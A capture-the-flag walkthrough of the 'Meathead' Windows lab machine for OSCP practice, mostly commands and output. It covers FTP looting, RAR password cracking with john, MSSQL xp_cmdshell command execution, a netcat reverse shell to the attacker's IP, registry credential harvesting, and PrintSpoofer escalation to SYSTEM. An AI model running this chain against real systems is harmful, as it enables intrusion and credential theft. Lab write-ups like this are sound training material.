Logo
Overview

PG: Meathead | Walkthrough

November 21, 2021
3 min read
PG/Machines Boot2Root OSCP/Prep writeups tools/john xp_cmdshell CVE/Plantronics Seimpersonate

Enumeration

Terminal window
$ sudo nmap $ip -p80,135,139,445,1435,3389 -sVC -O


PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Plantronics
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1435/tcp open  ibm-cics?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Meathead
| Not valid before: 2021-09-20T18:20:56
|_Not valid after:  2022-03-22T18:20:56
|_ssl-date: 2021-11-21T03:57:08+00:00; +2s from scanner time.
| rdp-ntlm-info:
|   Target_Name: MEATHEAD
|   NetBIOS_Domain_Name: MEATHEAD
|   NetBIOS_Computer_Name: MEATHEAD
|   DNS_Domain_Name: Meathead
|   DNS_Computer_Name: Meathead
|   Product_Version: 10.0.17763
|_  System_Time: 2021-11-21T03:56:28+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Additional scans

Terminal window
$ nmap $ip -p1221,1435,5895 -sVC --version-all


PORT     STATE    SERVICE  VERSION
1221/tcp open     ftp      Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-27-20  07:02PM                18866 Elementum Supremum.docx
| 04-27-20  07:02PM               764176 file_example_MP3_700KB.mp3
| 04-27-20  07:02PM                15690 img.jpg
| 04-27-20  07:02PM                  302 MSSQL_BAK.rar
| 04-27-20  07:02PM                  548 palindromes.txt
|_04-27-20  07:02PM                45369 server.jpg
| ftp-syst:
|_  SYST: Windows_NT
1435/tcp open     ms-sql-s Microsoft SQL Server 2017 14.00.1000
| ms-sql-ntlm-info:
|   Target_Name: MEATHEAD
|   NetBIOS_Domain_Name: MEATHEAD
|   NetBIOS_Computer_Name: MEATHEAD
|   DNS_Domain_Name: Meathead
|   DNS_Computer_Name: Meathead
|_  Product_Version: 10.0.17763
|_ssl-date: 2021-11-21T04:32:52+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-09-21T18:21:07
|_Not valid after:  2051-09-21T18:21:07
5895/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

Initial Access

Download the mssql_bal.rar files from FTP. It is password locked, crack it using john

Terminal window
$ john --wordlist=/usr/share/wordlists/rockyou.txt ./john.txt
<...>
letmeinplease    (mssql_bak.rar)

Extract the rar files to reveal the credential for mssql

Terminal window
$ unrar x mssql_bak.rar
UNRAR 6.02 freeware      Copyright (c) 1993-2021 Alexander Roshal
Enter password (will not be echoed) for mssql_bak.rar:
Extracting from mssql_bak.rar
Extracting  mssql_backup.txt                                          OK
All OK


$ cat mssql_backup.txt
Username: sa
Password: EjectFrailtyThorn425

XP_CMDSHELL Code Execution

Terminal window
$ mssqlclient.py sa:EjectFrailtyThorn425@192.168.155.70 -port 1435
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MEATHEAD\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MEATHEAD\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands


SQL> enable_xp_cmdshell
[*] INFO(MEATHEAD\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(MEATHEAD\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
nt service\mssql$sqlexpress
NULL

Reverse Shell

SQL> xp_cmdshell \\192.168.49.155\share\nc64.exe -e cmd.exe 192.168.49.155 80

** Credential Disclosure **

SQL> xp_cmdshell reg query HKLM /f pass /t REG_SZ /s
< . . . SNIP . . . >
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control


    CurrentPass    REG_SZ    TwilightAirmailMuck234
< . . . SNIP . . . >

RDP into the machine

Terminal window
$ rdesktop -u jane -p "TwilightAirmailMuck234" $ip

Privilege Escalation

Plantronics Hub 3.13.2 - Privilege Escalation

Terminal window
jane|advertise|C:\Windows\System32\cmd.exe

Seimpersonate | Printspoofer

Terminal window
C:\FTP>PrintSpoofer64.exe -i -c cmd
C:\Windows\system32>whoami
whoami
nt authority\system